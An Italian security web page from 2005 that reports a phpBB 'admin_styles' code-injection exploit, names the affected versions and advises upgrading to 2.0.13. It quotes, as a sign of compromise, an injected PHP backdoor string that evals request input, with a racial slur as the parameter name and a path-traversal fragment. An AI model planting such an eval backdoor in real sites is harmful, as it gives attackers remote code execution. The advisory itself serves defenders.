Sicurezza in Rete : VulnerabilitÓ, Virus, Worm, Exploit...

bitPortal.it: Programmazione Hardware e Software


 Programmazione
Visual Basic.NET
Visual C++
LabView
C/C++ con Linux
Tcl/Tk
Bash
HTML
Javascript
Sicurezza

 Siti Interessanti
Articoli riguardanti il tema del lavoro da casa
 lavorare da casa

Tutorial sul web hosting + Articoli riguardanti il tema dell' hosting di siti web
  Hosting Sito Web


  Sicurezza

Sicurezza

VulnerabilitÓ phpbb:
"admin_styles" Code Injection Exploit



Data 14/03/2005

E' stato reso noto un exploit che permette di attaccare la tabella phpbb_themes utilizzata dai forum phpbb per gestire i temi.


Versioni vulnerabili : Dalla versione 2.0.12 e tutte le versioni precedenti.

Questo exploit riesce ad acquisire i diritti di amministrazione (sruttundo un "errore di programmazione") che utilizza per modificare il tema del forum.

Cosa vede l'amministratore di un forum hackerato?
in seguito a questo attacco l'ammistratore vedrÓ nella sezione "gestione stili/temi" tutti i temi cancellati tranne quello di default, che verrÓ impostato come tema corrente. Sempre in questo pannello l'amministratore vedrÓ la seguente stringa: Codice:

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit(); 

  // /../../../../../../../../../../../../

                     ../../../../../../../tmp 

oltre a quella dello stile di default.
Se vedete la stringa riportata sopra nel vostro pannello Ŕ una chiara indicazione che il vostro forum Ŕ stato attaccato utilizzando l'exploit in questione.

Soluzione : Per impedire di essere attacati da questo exploit basta aggiornare alla versione 2.0.13.


Alcuni Link utili:

Scaricare la versione 2.0.13
http://sourceforge.net/...
Altri siti che riportano la notizia:
Frsirt.com
securityfocus.com

In Libreria


Network security. Nozioni di base. Primi passi nel mondo della sicurezza di rete | 1¬ ed.
Normalmente spedito in 3-5 giorni lavorativi
Prezzo di copertina: Euro 40,00
Scheda completa